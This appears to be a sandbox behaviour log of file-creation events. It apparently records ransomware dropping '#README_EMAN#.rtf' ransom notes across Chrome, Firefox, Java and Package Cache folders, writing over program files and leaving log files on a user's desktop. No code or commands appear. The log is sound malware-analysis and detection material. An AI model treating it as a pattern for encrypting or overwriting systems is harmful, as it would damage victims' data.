| Create | C:\ProgramData\Oracle\Java\javapath_target_5923062\java.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Package Cache\{3c3aafc8-d898-43ec-998f-965ffdae065a}\vcredist_x64.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Oracle\Java\.oracle_jre_usage\17dfc292991c7c24.timestamp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\state.rsm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Package Cache\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\state.rsm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\packages\vcRuntimeAdditional_amd64\cab1.cab | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\browser\crashreporter-override.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\vcRuntimeAdditional_x86\cab1.cab | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages\vcRuntimeMinimum_amd64\vc_runtimeMinimum_x64.msi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Oracle\Java\javapath\javaws.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\crashreporter.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\vc_runtimeMinimum_x64.msi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\nssdbm3.chk | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Package Cache\{3c3aafc8-d898-43ec-998f-965ffdae065a}\state.rsm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Package Cache\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\packages\vcRuntimeAdditional_amd64\cab1.cab | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\WidevineCdm\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\ProgramData\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages\vcRuntimeMinimum_amd64\cab1.cab | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\fontconfig.bfc | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\gmp-clearkey\0.1\manifest.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\update-settings.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\updater.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\bad_460F9943EA70F103.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\ProgramData\Package Cache\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\packages\vcRuntimeAdditional_x86\cab1.cab | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\elog_460F9943EA70F103.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Oracle\Java\javapath_target_5923062\javaws.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Package Cache\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\VC_redist.x86.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.009.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\removed-files | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\state.rsm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\hijrah-config-umalqura.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages\vcRuntimeMinimum_x86\vc_runtimeMinimum_x86.msi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.019.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\WidevineCdm\_platform_specific\win_x64\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\browser\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\browser\extensions\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\browser\VisualElements\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\defaults\pref\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\uninstall\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Maintenance Service\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\All Users\Microsoft\ClickToRun\9D76938C-943D-439F-A135-26D02821EE05\en-us.16\stream.x64.en-us.man.dat | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\packages\vcRuntimeAdditional_x86\cab1.cab | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Package Cache\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\packages\vcRuntimeMinimum_amd64\vc_runtimeMinimum_x64.msi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Windows Portable Devices\regulations_consensus_score.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages\vcRuntimeMinimum_x86\cab1.cab | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Package Cache\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\state.rsm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\javaws.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.004.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\cab1.cab | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.014.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Windows Mail\WinMail.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Oracle\Java\javapath\javaw.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\vc_runtimeAdditional_x64.msi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\vcRuntimeMinimum_x86\vc_runtimeMinimum_x86.msi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Oracle\Java\.oracle_jre_usage\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\ProgramData\Oracle\Java\javapath\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\ProgramData\Package Cache\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\packages\vcRuntimeMinimum_x86\vc_runtimeMinimum_x86.msi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\ClickToRun\8C296B8E-6699-457C-9415-3D0647E1D775\en-us.16\s641033.hash | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Package Cache\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\packages\vcRuntimeMinimum_amd64\cab1.cab | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Package Cache\{e52a6842-b0ac-476e-b48f-378a97a67346}\VC_redist.x64.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.010.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\EDA58A0B-AD79-496A-8530-618D08767E60\en-us.16\stream.x64.en-us.man.dat | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\en-us.16\stream.x64.en-us.hash | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\vcRuntimeMinimum_x86\cab1.cab | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\management\jmxremote.password.template | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\USOShared\Logs\UpdateUx.001.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Package Cache\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\packages\vcRuntimeAdditional_amd64\vc_runtimeAdditional_x64.msi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\rt.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.003.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Diagnosis\DownloadedScenarios\WINDOWS.UIF.xml.new | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.008.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\ClickToRun\9D76938C-943D-439F-A135-26D02821EE05\x-none.16\s640.hash | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.013.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\AirSpace.Etw.man | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Diagnosis\DownloadedScenarios\WINDOWS.DIAGNOSTICS.xml.new | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.app.json.bk | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\en-us.16\stream.x64.en-us.man.dat | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.018.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Oracle\Java\javapath_target_5923062\javaws.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Package Cache\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\VC_redist.x86.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Package Cache\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\packages\vcRuntimeAdditional_amd64\vc_runtimeAdditional_x64.msi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\elog_460F9943EA70F103.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\ProgramData\Package Cache\{3c3aafc8-d898-43ec-998f-965ffdae065a}\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\cfc.flights.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\Policy.vpol | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Package Cache\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\ProgramData\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages\vcRuntimeMinimum_amd64\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.011.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\User Account Pictures\user-40.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.006.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\USOShared\Logs\UpdateSessionOrchestration.011.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Package Cache\{e52a6842-b0ac-476e-b48f-378a97a67346}\state.rsm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\ClickToRun\9D76938C-943D-439F-A135-26D02821EE05\en-us.16\s641033.hash | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
